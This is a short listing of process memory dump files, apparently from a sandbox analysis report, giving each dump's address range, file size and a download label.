memory/4040-66-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4864-0-0x00007FF821C03000-0x00007FF821C05000-memory.dmp

Filesize
8KB

Download
memory/4864-6-0x00000132EDA70000-0x00000132EDA92000-memory.dmp

Filesize
136KB

Download
memory/4864-11-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download
memory/4864-12-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download
memory/4864-14-0x00007FF821C03000-0x00007FF821C05000-memory.dmp

Filesize
8KB

Download
memory/4864-16-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download
memory/4864-17-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download
memory/4864-20-0x00007FF821C00000-0x00007FF8226C1000-memory.dmp

Filesize
10.8MB

Download